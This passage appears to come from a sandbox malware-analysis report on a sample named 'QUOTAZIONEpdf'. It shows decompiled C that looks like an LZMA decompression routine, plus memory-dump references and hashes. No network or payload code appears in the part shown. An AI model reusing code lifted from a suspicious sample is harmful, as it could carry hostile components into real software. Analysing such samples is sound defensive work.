                							_v92 = __eax;
                							goto L148;
                						case 0x17:
                							L148:
                							__eax = _v68;
                							_v84 = 1;
                							_v76 = _v68;
                							goto L152;
                						case 0x18:
                							L149:
                							__eflags = _v112;
                							if(_v112 == 0) {
                								_v140 = 0x18;
                								goto L173;
                							}
                							__ecx = _v116;
                							__eax = _v16;
                							_v20 = _v20 << 8;
                							__ecx =  *_v116 & 0x000000ff;
                							_v112 = _v112 - 1;
                							_v16 << 8 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                							_t490 =  &_v116;
                							 *_t490 = _v116 + 1;
                							__eflags =  *_t490;
                							_v16 = _v16 << 0x00000008 |  *_v116 & 0x000000ff;
                							L151:
                							_t493 =  &_v76;
                							 *_t493 = _v76 - 1;
                							__eflags =  *_t493;
                							L152:
                							__eflags = _v76;
                							if(_v76 <= 0) {
                								__ecx = _v68;
                								__ebx = _v84;
                								0 = 1;
                								__eax = 1 << __cl;
                								__ebx = _v84 - (1 << __cl);
                								__eax = _v128;
                								_v72 = __ebx;
                								L143:
                								_v140 = _t561;
                								goto L3;
                							}
                							__eax = _v84;
                							_v20 = _v20 >> 0xb;
                							__edx = _v84 + _v84;
                							__eax = _v92;
                							__esi = __edx + __eax;
                							_v88 = __esi;
                							__ax =  *__esi;
                							__edi = __ax & 0x0000ffff;
                							__ecx = (_v20 >> 0xb) * __edi;
                							__eflags = _v16 - __ecx;
                							if(_v16 >= __ecx) {
                								_v20 = _v20 - __ecx;
                								_v16 = _v16 - __ecx;
                								__cx = __ax;
                								__cx = __ax >> 5;
                								__eax = __eax - __ecx;
                								__edx = __edx + 1;
                								__eflags = __edx;
                								 *__esi = __ax;
                								_v84 = __edx;
                							} else {
                								_v20 = __ecx;
                								0x800 = 0x800 - __edi;
                								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                								_v84 = _v84 << 1;
                								 *__esi = __cx;
                							}
                							__eflags = _v20 - 0x1000000;
                							if(_v20 >= 0x1000000) {
                								goto L151;
                							} else {
                								goto L149;
                							}
                						case 0x19:
                							__eflags = __ebx - 4;
                							if(__ebx < 4) {
                								_v48 = __ebx;
                								L122:
                								_t399 =  &_v48;
                								 *_t399 = _v48 + 1;
                								__eflags =  *_t399;
                								L123:
                								__eax = _v48;
                								__eflags = __eax;
                								if(__eax == 0) {
                									_v52 = _v52 | 0xffffffff;
                									goto L173;
                								}
                								__eflags = __eax - _v100;
                								if(__eax > _v100) {
                									goto L174;
                								}
                								_v52 = _v52 + 2;
                								__eax = _v52;
                								_t406 =  &_v100;
                								 *_t406 = _v100 + _v52;
                								__eflags =  *_t406;
                								goto L126;
                							}
                							__ecx = __ebx;
                							__eax = __ebx;
                							__ecx = __ebx >> 1;
                							__eax = __ebx & 0x00000001;
                							__ecx = (__ebx >> 1) - 1;
                							__al = __al | 0x00000002;
                							__eax = (__ebx & 0x00000001) << __cl;
                							__eflags = __ebx - 0xe;
                							_v48 = __eax;
                							if(__ebx >= 0xe) {
                								__ebx = 0;
                								_v76 = __ecx;
                								L105:
                								__eflags = _v76;
                								if(_v76 <= 0) {
                									__eax = __eax + __ebx;
                									_v68 = 4;
                									_v48 = __eax;
                									__eax = _v8;
                									__eax = _v8 + 0x644;
                									__eflags = __eax;
                									L111:
                									__ebx = 0;
                									_v92 = __eax;
                									_v84 = 1;
                									_v72 = 0;
                									_v76 = 0;
                									L115:
                									__eax = _v68;
                									__eflags = _v76 - _v68;
                									if(_v76 >= _v68) {
                										_t397 =  &_v48;
                										 *_t397 = _v48 + __ebx;
                										__eflags =  *_t397;
                										goto L122;
                									}
                									__eax = _v84;
                									_v20 = _v20 >> 0xb;
                									__edi = _v84 + _v84;
                									__eax = _v92;
                									__esi = __edi + __eax;
                									_v88 = __esi;
                									__ax =  *__esi;
                									__ecx = __ax & 0x0000ffff;
                									__edx = (_v20 >> 0xb) * __ecx;
                									__eflags = _v16 - __edx;
                									if(_v16 >= __edx) {
                										__ecx = 0;
                										_v20 = _v20 - __edx;
                										__ecx = 1;
                										_v16 = _v16 - __edx;
                										__ebx = 1;
                										__ecx = _v76;
                										__ebx = 1 << __cl;
                										__ecx = 1 << __cl;
                										__ebx = _v72;
                										__ebx = _v72 | __ecx;
                										__cx = __ax;
                										__cx = __ax >> 5;
                										__eax = __eax - __ecx;
                										__edi = __edi + 1;
                										__eflags = __edi;
                										_v72 = __ebx;
                										 *__esi = __ax;
                										_v84 = __edi;
                									} else {
                										_v20 = __edx;
                										0x800 = 0x800 - __ecx;
                										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                										_v84 = _v84 << 1;
                										 *__esi = __dx;
                									}
                									__eflags = _v20 - 0x1000000;
                									if(_v20 >= 0x1000000) {
                										L114:
                										_t374 =  &_v76;
                										 *_t374 = _v76 + 1;
                										__eflags =  *_t374;
                										goto L115;
                									} else {
                										goto L112;
                									}
                								}
                								__ecx = _v16;
                								__ebx = __ebx + __ebx;
                								_v20 = _v20 >> 1;
                								__eflags = _v16 - _v20;
                								_v72 = __ebx;
                								if(_v16 >= _v20) {
                									__ecx = _v20;
                									_v16 = _v16 - _v20;
                									__ebx = __ebx | 0x00000001;
                									__eflags = __ebx;
                									_v72 = __ebx;
                								}
                								__eflags = _v20 - 0x1000000;
                								if(_v20 >= 0x1000000) {
                									L104:
                									_t344 =  &_v76;
                									 *_t344 = _v76 - 1;
                									__eflags =  *_t344;
                									goto L105;
                								} else {
                									goto L102;
                								}
                							}
                							__edx = _v8;
                							__eax = __eax - __ebx;
                							_v68 = __ecx;
                							__eax = _v8 + 0x55e + __eax * 2;
                							goto L111;
                						case 0x1a:
                							L58:
                							__eflags = _v104;
                							if(_v104 == 0) {
                								_v140 = 0x1a;
                								goto L173;
                							}
                							__ecx = _v108;
                							__al = _v96;
                							__edx = _v12;
                							_v100 = _v100 + 1;
                							_v108 = _v108 + 1;
                							_v104 = _v104 - 1;
                							 *_v108 = __al;
                							__ecx = _v24;
                							 *(_v12 + __ecx) = __al;
                							__eax = __ecx + 1;
                							__edx = 0;
                							_t197 = __eax % _v120;
                							__eax = __eax / _v120;
                							__edx = _t197;
                							goto L82;
                						case 0x1b:
                							L78:
                							__eflags = _v104;
                							if(_v104 == 0) {
                								_v140 = 0x1b;
                								goto L173;
                							}
                							__eax = _v24;
                							__eax = _v24 - _v48;
                							__eflags = __eax - _v120;
                							if(__eax >= _v120) {
                								__eax = __eax + _v120;
                								__eflags = __eax;
                							}
                							__edx = _v12;
                							__cl =  *(__edx + __eax);
                							__eax = _v24;
                							_v96 = __cl;
                							 *(__edx + __eax) = __cl;
                							__eax = __eax + 1;
                							__edx = 0;
                							_t280 = __eax % _v120;
                							__eax = __eax / _v120;
                							__edx = _t280;
                							__eax = _v108;
                							_v100 = _v100 + 1;
                							_v108 = _v108 + 1;
                							_t289 =  &_v104;
                							 *_t289 = _v104 - 1;
                							__eflags =  *_t289;
                							 *_v108 = __cl;
                							L82:
                							_v24 = __edx;
                							goto L83;
                						case 0x1c:
                							while(1) {
                								L126:
                								__eflags = _v104;
                								if(_v104 == 0) {
                									break;
                								}
                								__eax = _v24;
                								__eax = _v24 - _v48;
                								__eflags = __eax - _v120;
                								if(__eax >= _v120) {
                									__eax = __eax + _v120;
                									__eflags = __eax;
                								}
                								__edx = _v12;
                								__cl =  *(__edx + __eax);
                								__eax = _v24;
                								_v96 = __cl;
                								 *(__edx + __eax) = __cl;
                								__eax = __eax + 1;
                								__edx = 0;
                								_t420 = __eax % _v120;
                								__eax = __eax / _v120;
                								__edx = _t420;
                								__eax = _v108;
                								_v108 = _v108 + 1;
                								_v104 = _v104 - 1;
                								_v52 = _v52 - 1;
                								__eflags = _v52;
                								 *_v108 = __cl;
                								_v24 = _t420;
                								if(_v52 > 0) {
                									continue;
                								} else {
                									L83:
                									_v140 = 2;
                									goto L3;
                								}
                							}
                							_v140 = 0x1c;
                							L173:
                							_push(0x22);
                							_pop(_t574);
                							memcpy(_v148,  &_v140, _t574 << 2);
                							return 0;
                					}
                				}
                				L174:
                				_t538 = _t537 | 0xffffffff;
                				return _t538;
                			}

                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                • Instruction ID: ba793bdfdeb6fca0581e378ecaac939fdd914989bdfd8c809e8e1c60c55c718d
                • Opcode Fuzzy Hash: a6e2085cebcdfb89d44d763a6c8341743f8cc52be166a66f13966f2f3d4d66a2
                • Instruction Fuzzy Hash: 90816972D04229DBDF24DFA8C844BAEBBB0FB44305F11816AD856B72C0C7785A86DF54
                Uniqueness

                Uniqueness Score: -1.00%

                C-Code - Quality: 98%
                			E004062EB() {
                				signed int _t539;
                				unsigned short _t540;
                				signed int _t541;
                				void _t542;
                				signed int _t543;
                				signed int _t544;
                				signed int _t573;
                				signed int _t576;
                				signed int _t597;
                				signed int* _t614;
                				void* _t621;
                
                				L0:
                				while(1) {
                					L0:
                					if( *(_t621 - 0x40) != 1) {
                						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
                						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
                						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
                						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
                						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
                						_t539 =  *(_t621 - 4) + 0x664;
                						 *(_t621 - 0x58) = _t539;
                						goto L68;
                					} else {
                						 *(__ebp - 0x84) = 8;
                						while(1) {
                							L132:
                							 *(_t621 - 0x54) = _t614;
                							while(1) {
                								L133:
                								_t540 =  *_t614;
                								_t597 = _t540 & 0x0000ffff;
                								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                								if( *(_t621 - 0xc) >= _t573) {
                									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                									 *(_t621 - 0x40) = 1;
                									_t541 = _t540 - (_t540 >> 5);
                									 *_t614 = _t541;
                								} else {
                									 *(_t621 - 0x10) = _t573;
                									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                									 *_t614 = (0x800 - _t597 >> 5) + _t540;
                								}
                								if( *(_t621 - 0x10) >= 0x1000000) {
                									goto L139;
                								}
                								L137:
                								if( *(_t621 - 0x6c) == 0) {
                									 *(_t621 - 0x88) = 5;
                									L170:
                									_t576 = 0x22;
                									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
                									_t544 = 0;
                									L172:
                									return _t544;
                								}
                								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
                								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                								L139:
                								_t542 =  *(_t621 - 0x84);
                								while(1) {
                									 *(_t621 - 0x88) = _t542;
                									while(1) {
                										L1:
                										_t543 =  *(_t621 - 0x88);
                										if(_t543 > 0x1c) {
                											break;
                										}
                										switch( *((intOrPtr*)(_t543 * 4 +  &M004068EF))) {
                											case 0:
                												if( *(_t621 - 0x6c) == 0) {
                													goto L170;
                												}
                												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                												_t543 =  *( *(_t621 - 0x70));
                												if(_t543 > 0xe1) {
                													goto L171;
                												}
                												_t547 = _t543 & 0x000000ff;
                												_push(0x2d);
                												asm("cdq");
                												_pop(_t578);
                												_push(9);
                												_pop(_t579);
                												_t617 = _t547 / _t578;
                												_t549 = _t547 % _t578 & 0x000000ff;
                												asm("cdq");
                												_t612 = _t549 % _t579 & 0x000000ff;
                												 *(_t621 - 0x3c) = _t612;
                												 *(_t621 - 0x1c) = (1 << _t617) - 1;
                												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
                												_t620 = (0x300 << _t612 + _t617) + 0x736;
                												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
                													L10:
                													if(_t620 == 0) {
                														L12:
                														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
                														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                														goto L15;
                													} else {
                														goto L11;
                													}
                													do {
                														L11:
                														_t620 = _t620 - 1;
                														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
                													} while (_t620 != 0);
                													goto L12;
                												}
                												if( *(_t621 - 4) != 0) {
                													GlobalFree( *(_t621 - 4));
                												}
                												_t543 = GlobalAlloc(0x40, 0x600); // executed
                												 *(_t621 - 4) = _t543;
                												if(_t543 == 0) {
                													goto L171;
                												} else {
                													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
                													goto L10;
                												}
                											case 1:
                												L13:
                												__eflags =  *(_t621 - 0x6c);
                												if( *(_t621 - 0x6c) == 0) {
                													 *(_t621 - 0x88) = 1;
                													goto L170;
                												}
                												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
                												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
                												_t45 = _t621 - 0x48;
                												 *_t45 =  *(_t621 - 0x48) + 1;
                												__eflags =  *_t45;
                												L15:
                												if( *(_t621 - 0x48) < 4) {
                													goto L13;
                												}
                												_t555 =  *(_t621 - 0x40);
                												if(_t555 ==  *(_t621 - 0x74)) {
                													L20:
                													 *(_t621 - 0x48) = 5;
                													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
                													goto L23;
                												}
                												 *(_t621 - 0x74) = _t555;
                												if( *(_t621 - 8) != 0) {
                													GlobalFree( *(_t621 - 8));
                												}
                												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
                												 *(_t621 - 8) = _t543;
                												if(_t543 == 0) {
                													goto L171;
                												} else {
                													goto L20;
                												}
                											case 2:
                												L24:
                												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
                												 *(_t621 - 0x84) = 6;
                												 *(_t621 - 0x4c) = _t562;
                												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
                												goto L132;
                											case 3:
                												L21:
                												__eflags =  *(_t621 - 0x6c);
                												if( *(_t621 - 0x6c) == 0) {
                													 *(_t621 - 0x88) = 3;
                													goto L170;
                												}
                												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
                												_t67 = _t621 - 0x70;
                												 *_t67 =  &(( *(_t621 - 0x70))[1]);
                												__eflags =  *_t67;
                												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
                												L23:
                												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
                												if( *(_t621 - 0x48) != 0) {
                													goto L21;
                												}
                												goto L24;
                											case 4:
                												L133:
                												_t540 =  *_t614;
                												_t597 = _t540 & 0x0000ffff;
                												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
                												if( *(_t621 - 0xc) >= _t573) {
                													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
                													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
                													 *(_t621 - 0x40) = 1;
                													_t541 = _t540 - (_t540 >> 5);
                													 *_t614 = _t541;
                												} else {
                													 *(_t621 - 0x10) = _t573;
                													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
                													 *_t614 = (0x800 - _t597 >> 5) + _t540;
                												}
                												if( *(_t621 - 0x10) >= 0x1000000) {
                													goto L139;
                												}
                											case 5:
                												goto L137;
                											case 6:
                												__edx = 0;
                												__eflags =  *(__ebp - 0x40);
                												if( *(__ebp - 0x40) != 0) {
                													__eax =  *(__ebp - 4);
                													__ecx =  *(__ebp - 0x38);
                													 *(__ebp - 0x34) = 1;
                													 *(__ebp - 0x84) = 7;
                													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
                													L132:
                													 *(_t621 - 0x54) = _t614;
                													goto L133;
                												}
                												__eax =  *(__ebp - 0x5c) & 0x000000ff;
                												__esi =  *(__ebp - 0x60);
                												__cl = 8;
                												__cl = 8 -  *(__ebp - 0x3c);
                												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                												__ecx =  *(__ebp - 0x3c);
                												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                												__ecx =  *(__ebp - 4);
                												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                												__eflags =  *(__ebp - 0x38) - 4;
                												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                												if( *(__ebp - 0x38) >= 4) {
                													__eflags =  *(__ebp - 0x38) - 0xa;
                													if( *(__ebp - 0x38) >= 0xa) {
                														_t98 = __ebp - 0x38;
                														 *_t98 =  *(__ebp - 0x38) - 6;
                														__eflags =  *_t98;
                													} else {
                														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                													}
                												} else {
                													 *(__ebp - 0x38) = 0;
                												}
                												__eflags =  *(__ebp - 0x34) - __edx;
                												if( *(__ebp - 0x34) == __edx) {
                													__ebx = 0;
                													__ebx = 1;
                													goto L61;
                												} else {
                													__eax =  *(__ebp - 0x14);
                													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                													__eflags = __eax -  *(__ebp - 0x74);
                													if(__eax >=  *(__ebp - 0x74)) {
                														__eax = __eax +  *(__ebp - 0x74);
                														__eflags = __eax;
                													}
                													__ecx =  *(__ebp - 8);
                													__ebx = 0;
                													__ebx = 1;
                													__al =  *((intOrPtr*)(__eax + __ecx));
                													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                													goto L41;
                												}
                											case 7:
                												goto L0;
                											case 8:
                												__eflags =  *(__ebp - 0x40);
                												if( *(__ebp - 0x40) != 0) {
                													__eax =  *(__ebp - 4);
                													__ecx =  *(__ebp - 0x38);
                													 *(__ebp - 0x84) = 0xa;
                													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                												} else {
                													__eax =  *(__ebp - 0x38);
                													__ecx =  *(__ebp - 4);
                													__eax =  *(__ebp - 0x38) + 0xf;
                													 *(__ebp - 0x84) = 9;
                													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                												}
                												while(1) {
                													L132:
                													 *(_t621 - 0x54) = _t614;
                													goto L133;
                												}
                											case 9:
                												__eflags =  *(__ebp - 0x40);
                												if( *(__ebp - 0x40) != 0) {
                													goto L89;
                												}
                												__eflags =  *(__ebp - 0x60);
                												if( *(__ebp - 0x60) == 0) {
                													goto L171;
                												}
                												__eax = 0;
                												__eflags =  *(__ebp - 0x38) - 7;
                												_t258 =  *(__ebp - 0x38) - 7 >= 0;
                												__eflags = _t258;
                												0 | _t258 = _t258 + _t258 + 9;
                												 *(__ebp - 0x38) = _t258 + _t258 + 9;
                												goto L75;
                											case 0xa:
                												__eflags =  *(__ebp - 0x40);
                												if( *(__ebp - 0x40) != 0) {
                													__eax =  *(__ebp - 4);
                													__ecx =  *(__ebp - 0x38);
                													 *(__ebp - 0x84) = 0xb;
                													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                													while(1) {
                														L132:
                														 *(_t621 - 0x54) = _t614;
                														goto L133;
                													}
                												}
                												__eax =  *(__ebp - 0x28);
                												goto L88;
                											case 0xb:
                												__eflags =  *(__ebp - 0x40);
                												if( *(__ebp - 0x40) != 0) {
                													__ecx =  *(__ebp - 0x24);
                													__eax =  *(__ebp - 0x20);
                													 *(__ebp - 0x20) =  *(__ebp - 0x24);
                												} else {
                													__eax =  *(__ebp - 0x24);
                												}
                												__ecx =  *(__ebp - 0x28);
                												 *(__ebp - 0x24) =  *(__ebp - 0x28);
                												L88:
                												__ecx =  *(__ebp - 0x2c);
                												 *(__ebp - 0x2c) = __eax;
                												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                												L89:
                												__eax =  *(__ebp - 4);
                												 *(__ebp - 0x80) = 0x15;
                												__eax =  *(__ebp - 4) + 0xa68;
                												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
                												goto L68;
                											case 0xc:
                												L99:
                												__eflags =  *(__ebp - 0x6c);
                												if( *(__ebp - 0x6c) == 0) {
                													 *(__ebp - 0x88) = 0xc;
                													goto L170;
                												}
                												__ecx =  *(__ebp - 0x70);
                												__eax =  *(__ebp - 0xc);
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												_t334 = __ebp - 0x70;
                												 *_t334 =  *(__ebp - 0x70) + 1;
                												__eflags =  *_t334;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												__eax =  *(__ebp - 0x2c);
                												goto L101;
                											case 0xd:
                												L37:
                												__eflags =  *(__ebp - 0x6c);
                												if( *(__ebp - 0x6c) == 0) {
                													 *(__ebp - 0x88) = 0xd;
                													goto L170;
                												}
                												__ecx =  *(__ebp - 0x70);
                												__eax =  *(__ebp - 0xc);
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												_t122 = __ebp - 0x70;
                												 *_t122 =  *(__ebp - 0x70) + 1;
                												__eflags =  *_t122;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												L39:
                												__eax =  *(__ebp - 0x40);
                												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                													goto L48;
                												}
                												__eflags = __ebx - 0x100;
                												if(__ebx >= 0x100) {
                													goto L54;
                												}
                												L41:
                												__eax =  *(__ebp - 0x5b) & 0x000000ff;
                												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                												__ecx =  *(__ebp - 0x58);
                												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                												 *(__ebp - 0x48) = __eax;
                												__eax = __eax + 1;
                												__eax = __eax << 8;
                												__eax = __eax + __ebx;
                												__esi =  *(__ebp - 0x58) + __eax * 2;
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                												__ax =  *__esi;
                												 *(__ebp - 0x54) = __esi;
                												__edx = __ax & 0x0000ffff;
                												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                												__eflags =  *(__ebp - 0xc) - __ecx;
                												if( *(__ebp - 0xc) >= __ecx) {
                													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                													__cx = __ax;
                													 *(__ebp - 0x40) = 1;
                													__cx = __ax >> 5;
                													__eflags = __eax;
                													__ebx = __ebx + __ebx + 1;
                													 *__esi = __ax;
                												} else {
                													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                													 *(__ebp - 0x10) = __ecx;
                													0x800 = 0x800 - __edx;
                													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                													__ebx = __ebx + __ebx;
                													 *__esi = __cx;
                												}
                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                												 *(__ebp - 0x44) = __ebx;
                												if( *(__ebp - 0x10) >= 0x1000000) {
                													goto L39;
                												} else {
                													goto L37;
                												}
                											case 0xe:
                												L46:
                												__eflags =  *(__ebp - 0x6c);
                												if( *(__ebp - 0x6c) == 0) {
                													 *(__ebp - 0x88) = 0xe;
                													goto L170;
                												}
                												__ecx =  *(__ebp - 0x70);
                												__eax =  *(__ebp - 0xc);
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												_t156 = __ebp - 0x70;
                												 *_t156 =  *(__ebp - 0x70) + 1;
                												__eflags =  *_t156;
                												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												while(1) {
                													L48:
                													__eflags = __ebx - 0x100;
                													if(__ebx >= 0x100) {
                														break;
                													}
                													__eax =  *(__ebp - 0x58);
                													__edx = __ebx + __ebx;
                													__ecx =  *(__ebp - 0x10);
                													__esi = __edx + __eax;
                													__ecx =  *(__ebp - 0x10) >> 0xb;
                													__ax =  *__esi;
                													 *(__ebp - 0x54) = __esi;
                													__edi = __ax & 0x0000ffff;
                													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                													__eflags =  *(__ebp - 0xc) - __ecx;
                													if( *(__ebp - 0xc) >= __ecx) {
                														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                														__cx = __ax;
                														_t170 = __edx + 1; // 0x1
                														__ebx = _t170;
                														__cx = __ax >> 5;
                														__eflags = __eax;
                														 *__esi = __ax;
                													} else {
                														 *(__ebp - 0x10) = __ecx;
                														0x800 = 0x800 - __edi;
                														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                														__ebx = __ebx + __ebx;
                														 *__esi = __cx;
                													}
                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                													 *(__ebp - 0x44) = __ebx;
                													if( *(__ebp - 0x10) >= 0x1000000) {
                														continue;
                													} else {
                														goto L46;
                													}
                												}
                												L54:
                												_t173 = __ebp - 0x34;
                												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
                												__eflags =  *_t173;
                												goto L55;
                											case 0xf:
                												L58:
                												__eflags =  *(__ebp - 0x6c);
                												if( *(__ebp - 0x6c) == 0) {
                													 *(__ebp - 0x88) = 0xf;
                													goto L170;
                												}
                												__ecx =  *(__ebp - 0x70);
                												__eax =  *(__ebp - 0xc);
                												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                												_t203 = __ebp - 0x70;
                												 *_t203 =  *(__ebp - 0x70) + 1;
                												__eflags =  *_t203;
